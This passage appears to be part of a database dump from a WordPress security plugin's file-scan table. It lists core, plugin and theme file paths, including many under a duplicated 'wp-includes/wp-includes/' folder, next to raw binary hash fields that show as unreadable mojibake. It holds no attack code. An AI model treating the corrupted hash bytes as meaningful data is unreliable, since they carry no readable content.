���$��o=�@��k����Jl�','',0,'?'),('��r9y��/���Z]�','wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js',0,'m�iz+*;)��E�','m�iz+*;)��E�','�-5(��:�oQ[̪���\\�\nm~�CP','',0,'?'),('�Ϋ����q9�Z~؀Bq','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-locations-control.php',0,'�D��]σ��2+fX','�D��]σ��2+fX','Ѵg�h��m�s�ꄑ��-vmQ�Ij�\Z]sQT9�m','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;.�K� Ld�-�','�-��]y|��\"c�n��$�q�0LL��c�@','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�SD�=�nK�ظ�','wp-includes/wp-includes/version.php',0,'��|�\ZelǢc�$�\Z','��|�\ZelǢc�$�\Z','H70wN1��_\n�T?a��(-l�]�g��9','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q����-ڠ�t�56�',',C=ē0ȸ�a&�\"WӸ��Ă��0\n�(�73x','',0,'?'),('��DT\'{�_̤ؤP7','wp-content/plugins/wp-cerber/assets/flags/gf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nFs�{7}X#@�Vؐ','�KCZ��p���YJ\01 ���7aƎ��F�����','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�{(諸���S:�<X>','wp-includes/wp-includes/rest-api/search/class-wp-rest-search-handler.php',0,',��x&����{\n�x�\\',',��x&����{\n�x�\\','�sޢ���zj�λ�\'Ҳ���wE�?��','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s�zrU[\nK��z��','s�d����� J�WL�+<�I���S4y$)T@','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y\'�@>@������','��o���m�z�Jr;P���%��ːdUS3��>','',0,'?'),('��~f���J��,��','wp-content/themes/sg-window/img/icons/small/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�h%8���U��L��','�ɢ�[��P1Ik2����Q���#)�	�ډcP','',0,'?'),('���	�JB1�����','wp-includes/wp-includes/js/dist/annotations.js',0,'��T[qx/�^�`P����','��T[qx/�^�`P����','��7��[PS�%�\r����)/Qe�X�|ۺ4�','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���…�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('��W�h�DsN� �I5','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-fetch.min.js',0,'���蛻�0�ե�J9�','���蛻�0�ե�J9�','�V�j݈��o��ȟ{\'7�Úع�����','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?)LH\rb��pi','7h����/���/y��3L��\"�U��n��H\n��','',0,'?'),('���vs<g�bv0�1��','wp-includes/wp-includes/SimplePie/Cache/Redis.php',0,'o.*h�`|,{���mg','o.*h�`|,{���mg','�Yj�q��O�L����1����v��|�b�}|U','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�@�<�� ����M�','wp-includes/wp-includes/js/customize-loader.js',0,'�`�6��!��҃z��','�`�6��!��҃z��','�G?~�D�,(�F]�I�bNE��pc�v:���z','',0,'?'),('�N�]�2J�P��:','wp-content/themes/shootingstar/css/pie/PIE.htc',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';���nA��\\(��','\Z���c�K�ZG��}�M�^��O��:{\0}JQ?','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('����L�7HnWE�DM�','wp-content/plugins/wp-cerber/assets/flags/sj.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j.��#�0�P','2�!��u��6#=�%�ӹO���C4�	\Z���rM�','',0,'?'),('���x�vOR�cb�x�','wp-includes/wp-includes/images/crystal/code.png',0,'`�1�����1�9','`�1�����1�9',';�67����\r�!����x\Z_@H��&C��-��','',0,'?'),('������T�^�䘪�','wp-includes/wp-includes/js/jquery/ui/draggable.min.js',0,'�J���\\O��Љ/�Hp%','�J���\\O��Љ/�Hp%','�N��B\0�!8\r���o? �)E�C>��','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��[��z8,g�h(�~�','bl�C�$K�P4��R8��_��a�$�X�','',0,'?'),('�ه�Wz���0���L`','wp-includes/wp-includes/rest-api/search/class-wp-rest-term-search-handler.php',0,'��cW�U��ԟ�`B	','��cW�U��ԟ�`B	','w�\r��j�*�m�l]� �t��PU�\r�E��','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('���5zj���n��x�@','wp-includes/wp-includes/js/jquery/ui/progressbar.min.js',0,'\Z�sk�����Z�j	Y','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('��k5NK�Esu�5]�','wp-includes/wp-includes/css/wp-auth-check.min.css',0,'�j��b�u��=�`c','�j��b�u��=�`c','�\r[�B�{\'C�N5zZw� pȈ��I�K�e ��','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('����F)��cPO�R�?','wp-content/themes/sg-window/img/icons/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M4�m�W�G�#��','~ ���o�W��������c�L�[5�R)f>�','',0,'?'),('���4��vT�?O��','wp-includes/wp-includes/class-wp-date-query.php',0,'3�U��	�L]-�Rs�@�','3�U��	�L]-�Rs�@�','ֲP4]���!	o3\n��l���Q�0�','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�k/�Z���™D)','��1`C�w���8�<�w1�ko����\\/��%s�','',0,'?'),('����HТaN�L��','wp-content/themes/shootingstar/docs/assets/blueprint-css/plugins/link-icons/screen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K0���ܺSʥlJ^G','�s�w��1��K��A�+^����a���)�?j ','',0,'?'),('�J���\Z��m=�','wp-content/themes/sg-window/inc/widget-items-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�yZr�,��F郀���',' @�g�*�[4�o��!_�~����\ZH����R','',0,'?'),('�4��+��&S�`J','wp-includes/wp-includes/feed.php',0,'�z2�j��(=iSM�IV�','�z2�j��(=iSM�IV�','\Z�/������\'\\��.��	7�����3','',0,'?'),('�C8���t+���)I','wp-includes/wp-includes/blocks/heading/block.json',0,'M�J��+��4G��Ѹ','M�J��+��4G��Ѹ','+\\�X��IJ��J����\'�|��KiV��TD����u','',0,'?'),('�D��?ļ�\n����','wp-content/plugins/wp-cerber/assets/flags/ml.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��hϸ-�1�՞��3','�A\0�]�ҕ#�:\r40�2��W�A%��)V\n','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�~yEfF��d�x��','O�tJʰ�Z伡��V�S<ͤw�z1W�~>��0)','',0,'?'),('�g�h�B�g��lI�~','wp-includes/wp-includes/js/dist/vendor/react-dom.js',0,'C��InV��9����','C��InV��9����','LrJ�#��6h����\r�ȴD�R5��b:uM','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Ԝ����p1l�','\ns�:���$�}K���%\rr�hM��Ap\r��','',0,'?'),('���6x����O�����e','wp-content/themes/sg-window/inc/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�p�:.������B\r','�o�mBa��S�\n�{}$g-�	Gfh���','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	P�f�R2���.��z','��/��\n���0ۥK���.�Į�\r&$B�\Z}','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('���^>���6z�@p�','wp-includes/wp-includes/rest-api/endpoints/class-wp-rest-taxonomies-controller.php',0,'�C_�n�4]hc��3�?','�C_�n�4]hc��3�?','�wD�Z��s�J������dӚ�K���N҇','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('���Z�C?��Ԟ��','wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php',0,'9�5��e�f��#�ϝ','9�5��e�f��#�ϝ','��i��\rC��\"Գ�\r4��8�c��S��','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('��5#�\"8�%`}','wp-content/wflogs/template.php',0,'lC�db��.�˴�v','lC�db��.�˴�v','Z][W��P�}�,������7*�q��\n��Ƒ��','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n	H�M��','FO���V3\"���������!k�P�','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('���C�s�ZoBx�F�','wp-content/themes/sg-window/img/empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��u�,`d�G��','\\˫[��	x7��U˳���W4��_}���1��','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('�EW]Vݐ�Ձ�6�]�\0','wp-includes/wp-includes/class-wp-simplepie-sanitize-kses.php',0,'\0s�7�^�GU���_','\0s�7�^�GU���_','�EJ�\'{6�i���|�~�c��/�l','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������K��Mý','��{�\"�z�GW1ɓDĝ��U�͏�[���','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�|W��<�|ƀJ��','wp-content/plugins/wp-cerber/assets/flags/cw.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��Y7����yZn��\0','wp-includes/wp-includes/js/jquery/ui/menu.min.js',0,'e��\"f_�2�eg�','e��\"f_�2�eg�','�{�B��x��\r;f	�2��4�/����4E�','',0,'?'),('��eN#x�ܕ���{','wp-includes/wp-includes/class-wp-http-requests-hooks.php',0,'�,ͣa4h��D�U�+','�,ͣa4h��D�U�+','�5���կzV��Rt�I/�+˘H0N����\'C','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('��_´T�������','wp-includes/wp-includes/rest-api.php',0,'W�ם�Z�1I$\'O�','W�ם�Z�1I$\'O�','�|\r�j���͞�;#�\nZ�0�|�Iݩ���','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z��3�r�;]�<|�','����1��y吥!�}}�3ɻ}}�te\nt�','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x�����\r�]@��','�M�!҃�hMg?LO�\0ş�@���M�\"M�.','',0,'?'),('��zc|��ـ�vM','wp-includes/wp-includes/css/dist/block-library/style.min.css',0,'����{`�q���\'2P','����{`�q���\'2P','Wf�y�����7hc��ajkgd�4��8�ɢ��','',0,'?'),('��x�z��z��jMH��','wp-includes/wp-includes/class-wp-http-response.php',0,'��4��y�K���ߕ','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��$ \'�6�y�T}3�','wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js',0,'�C9���Y�O���','�C9���Y�O���','���+�®-FVp�ݨIht�L�iP%K��i��6','',0,'?'),('��	�\")�\"��0I�o��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/XChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z��q\Zs��q776�','C�D�a�$�=�f[Q�4�JW�7l)�.�=%��','',0,'?'),('�������&Ż�(','wp-admin/js/widgets/custom-html-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��˧0�o�r�j�{�','<������\"W63�`�/p�0h���LH�MG1','',0,'?'),('��~+�q�X��\"`','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oaQ���|g�4&��','�c�U�X����+�]Wvd�=�,����Z0)\\�','',0,'?'),('�]~���K*Ղ㈔','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-dom-rect.js',0,'��lS?,�ra�4;�^F','��lS?,�ra�4;�^F','�D�;�䏑��eH�i�b�\Z�?�b����','',0,'?'),('�6���[\ZM����','wp-includes/wp-includes/Requests/Exception/HTTP/400.php',0,'Q�n���VJ�R�x�5��','Q�n���VJ�R�x�5��','�d�>����	�i�H����b$�&�n���6�p\Z','',0,'?'),('�O��Ů�t&�ܠ�bJ','wp-includes/wp-includes/blocks/preformatted/block.json',0,'Lr\r,�Av`�� ���T','Lr\r,�Av`�� ���T','6�.�_��*��NMo�\r��k��n�Z�\r/��+','',0,'?'),('�|Y�!�9��c!YQ','wp-includes/wp-includes/media-template.php',0,'��]p�uA@j4� k','��]p�uA@j4� k','|p��!NR�o�*mc�>�8��t���f5-\Z;m6','',0,'?'),('��}Hy�M��1�ě8','wp-admin/images/about-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nڢ�U�����M�','��@^��Iͮ�s������L�:}|9�ƶ�KXk','',0,'?'),('��=CѠ��*TX�4','wp-admin/css/colors/_variables.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ր�]P�̍f��Vk�k�','�3}�c9j�my�����@s��p�VR�9Z','',0,'?'),('����;X�3�j����','wp-includes/wp-includes/sodium_compat/lib/php72compat_const.php',0,'XP�sHG�/n�w','XP�sHG�/n�w','�-ܙ���_�P^�C����`ֵ�.���F�If','',0,'?'),('��ڷt�g�Z�gE�','wp-includes/class-wp-http-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4��y�K���ߕ','�Ι	��[�{\0If�\0�t��v\n9d����x��','',0,'?'),('��K5E�,\\��l�','wp-includes/wp-includes/js/tinymce/plugins/wpautoresize/plugin.min.js',0,'=���B�9�$v\r	','=���B�9�$v\r	','�X�-��y���H��VKr�V��Y˴t���X��','',0,'?'),('�� ��It13&','wp-admin/js/nav-menu.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F0�ݶN��j�!�','����mn��hAɉg8��gj���m[)�B��','',0,'?'),('���G�l���ݠ_�','wp-includes/js/dist/date.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�	���naO��{&��','v�������9@���~4��\\�y�)����','',0,'?'),('�0E&ʖtVw,�A��','wp-includes/wp-includes/images/media/document.png',0,'v�4�8�Αy�6�d�','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('�J-狁��\\\"�ץ&�','wp-includes/sodium_compat/src/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ�����WS�Rh?�I','� �\r��(�_�q*h7w@�L_C���s+','',0,'?'),('�%�d�[��I�#�4�$','wp-content/themes/shootingstar/css/colors/turquoise.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)Y/��\"	Y�}','�\0�7)�;����	�������u�Z-N��¹�','',0,'?'),('�;?2��S��\0��p','wp-admin/customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w ���y����C>�','��vV��� v�b��\Z�[Zu�G� GnA�\"�H77','',0,'?'),('�X��@��%�1C��i','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m]�a���\\$��','Ǘ�h?���S���)�:���i@h.��X�g��','',0,'?'),('�[�?��n2��\"d�d','wp-content/plugins/wp-cerber/assets/bn4ra.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8��L���uLT�','�TZ�G���~S-�{&M:�\r��/7O���T�','',0,'?'),('�]�.�1\rPXL�','wp-admin/includes/update.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^	�4j��/�?\\��','�V��a�U�ˁ�F�V���ߴYn$\ZӸ#�\'R�K�','',0,'?'),('�a�#(QD���h�G�V','wp-includes/wp-includes/ID3/module.audio-video.asf.php',0,'^�Oo�x�&]��\\L','^�Oo�x�&]��\\L','͆%F	��/\r���:�����0;>�_M3��w�','',0,'?'),('�f(�9��6��yaN|2','wp-content/plugins/wordfence/waf/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z^:@��JKL����S','�\rH����n`�>�--\\Tr���7,��','',0,'?'),('�rY��\0�S���(z|�','wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-Gb�yf��|��S���','�o��G5}[�`�n��x���ܡ^�@B#���lb','',0,'?'),('�s)�7���/M@);�','wp-content/themes/sg-window/img/icons/digg.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dMp�aH_��W�e�','�\'o�~��k%�cAW��?�^�rbH\0A]�','',0,'?'),('�s8��\'��ɀ�\Z%Cx','wp-includes/blocks/archives/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u�P*�5�\\�d\"Sn�','�/qkU����5i�#��-�̄aye�d̹�B:','',0,'?'),('�u$�{���ܨ��v�','wp-includes/blocks/latest-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j��c\r9+@/K<�2','=�\n+rS�D;��|�Y}�VĒP[�o =]LJ','',0,'?'),('�~K�Ɂ�wwf�C�','wp-admin/js/widgets/media-gallery-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�c/����I���<�','�y�\\�R�T�ܠ�U�tmY�(��㻱̿','',0,'?'),('��}z��#����\Z','wp-includes/Requests/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','52]��{�}��	`X','�I?~�4���]4�����K��F��\"v�I(','',0,'?'),('��\0ceU�`�{��g��','wp-content/plugins/wp-cerber/assets/flags/kr.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S�Uґ0Pl�{��ip','Zy���\Z�(�r��Q�N��ӌ���b�[P���','',0,'?'),('��\r���[��\0�EuJ','wp-includes/sitemaps/providers/class-wp-sitemaps-taxonomies.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�V�̦���QK�#΀','�Q��]+N��[m^̋B���1��Ϗ��}�','',0,'?'),('��4�y�3%k� ����','wp-admin/js/widgets/media-image-widget.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��;k�#?��cQ7��(e','�o��{�\rr�h5��F�w�w�	L�e�Fz�]�','',0,'?'),('������|� ��','wp-includes/js/masonry.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';?�&��T�Je�xH','$��!�|=#f�c�jc���:��T�Q0b�,ʉ�','',0,'?'),('��Θ��r(��Ł�� ','wp-admin/js/auth-app.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#���LP���S[��f�','F@H���8�݇��7an���#{�����j�','',0,'?'),('��nHHХR���?','wp-content/plugins/wp-cerber/assets/flags/gh.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,La^���#d�e\'','��^�sV��z�3���:4�i�[��K���','',0,'?'),('���v{C����ҧ��4I','wp-content/plugins/wordfence/lib/wfViewResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�����\"J�3Z��w','�m��e�=�H��oD���OT�\0�v���','',0,'?'),('��JL��[q��&�D=r','wp-includes/wp-includes/sitemaps/class-wp-sitemaps.php',0,'5.R�\0I�u�\'tV�','5.R�\0I�u�\'tV�','g���e��;�_~�_f/Pv��hm�H��g�','',0,'?'),('��p�$^���d�Z','wp-admin/network/plugin-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%(F��v\0�~��F','ڙs-s���~�uYe������T��F�4�!� *','',0,'?'),('��G��ۉ��\\}����','wp-content/plugins/wp-cerber/assets/flags/cc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� .-6�׈���C#�','&��i��y�_��_����vV>�~���d','',0,'?'),('��[K���b���28�','wp-includes/pomo/po.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{K_��eG�@{	/','�G\n�{2����@k�ٗ��9Բ�1G9��P�','',0,'?'),('���o�(�\r�<�T�0n','wp-includes/wp-includes/cache-compat.php',0,'�?�Iq_��P�$ӄ','�?�Iq_��P�$ӄ','���]4\'��9���w�E��J�J�\r�nh�','',0,'?'),('��;�L%mn�#�`�','wp-content/themes/shootingstar/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����_�Ed[��h','����K9�}�����S�E\"��ݳ�R�>P','',0,'?'),('�\0 �ݳI��&�\n��','wp-content/themes/sg-window/img/icons/small/rss.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X\\I�ӱT�ŵ�\\=�u','��V\0k���6!N\'Z}\rO�/����S�Bk=�','',0,'?'),('���X����J��p','wp-content/plugins/wordfence/lib/wfBrowscapCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T����Q�x�j�','�����1Y����T��Ј�q�W6݋���h	','',0,'?'),('�,�3�!x���7�N0��','wp-includes/wp-includes/class-wp-paused-extensions-storage.php',0,'%�ʤ�O��.�LX','%�ʤ�O��.�LX','UY����ޖ\\\nj6h��́��bYn��5��','',0,'?'),('�S���q�`���M�','wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڡq�1�b��4�	G*','{U%�Hv��3�)�|w��-L��&���.䌩','',0,'?'),('�n֢��\r�V5��,�','wp-includes/widgets/class-wp-widget-meta.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ha�+��ޭj�s2���','f��\r`.\\�۬\r�����H�Pg���!M�w�m��','',0,'?'),('�o����l>��x~I� �','wp-admin/network/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���(���4�G�','��j/}Ӆ���\0E�S��̤\\Hg�#Z��._','',0,'?'),('�pJc#��bV���v�R�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php',0,'�b4�\'��&��','�b4�\'��&��','ۼ�4P\'���hN�a�>���E�5ఛ','',0,'?'),('���0j�l�S�K�','wp-includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{��Ԑ��[\"`}B','�)���v��\"�G��\"�YV<�Q�X 